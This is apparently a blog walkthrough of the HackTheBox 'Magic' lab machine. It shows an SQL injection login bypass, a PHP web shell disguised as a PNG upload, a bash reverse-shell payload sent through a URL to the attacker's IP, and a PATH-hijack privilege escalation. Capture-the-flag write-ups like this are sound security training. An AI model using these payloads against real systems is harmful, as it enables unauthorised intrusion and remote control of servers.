Magic
Last updated
Last updated
Magic is a Medium rated difficulty Linux machine from HackTheBox created by TRX. This machine is well designed, is not complex and you don’t have to search from every corner of the machine for some clues. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.44.173
First of all, let’s start with a basic scan.
Browser: http://10.129.44.173
Browser: http://10.129.44.173/login.php
Here we are going to try 2 login combinations, a default password and an SQL Injection, {admin : admin} and {admin : ' or 1=1 -- -}. With the second one you will be in.
Browser: http://10.129.44.173/upload.php
We can upload files and we know the directory /images/uploads/ to visit the image alone (You can test it if you want), so first we will try to upload a PHP file.
With that utility, by writing test.php?cmd={Command} at the end of the URL in the location of the file, we will be able to enter to the machine.
Browser: {Upload test.php}
By the magic numbers, the file is recognized as a PHP Script file, with knowing this, we will modify a PNG file and add the code.
Browser: {search and download a png file}
Browser: {upload downloaded.php.png}
Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=whoami
So, now we are going to login to the shell, for this we need a local Terminal [Term] and the browser.
Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=bash -c ‘bash -i >%26 /dev/tcp/10.10.14.18/443 0>%261’
Remember: To use commands at URLs, your ‘&’ are ‘%26’ (URL Encoding)
Ok, we have to find a way to become the user Theseus, our first option is to explore the files of the website.
We need to know how the command sysinfo works, by using string we can explore the whole command
So, we have to find from where ($PATH) found the command and change the path priority o execute a non-dangerous fdisk file.
Now we are going to create a new fdisk and change the PATH to read ours.
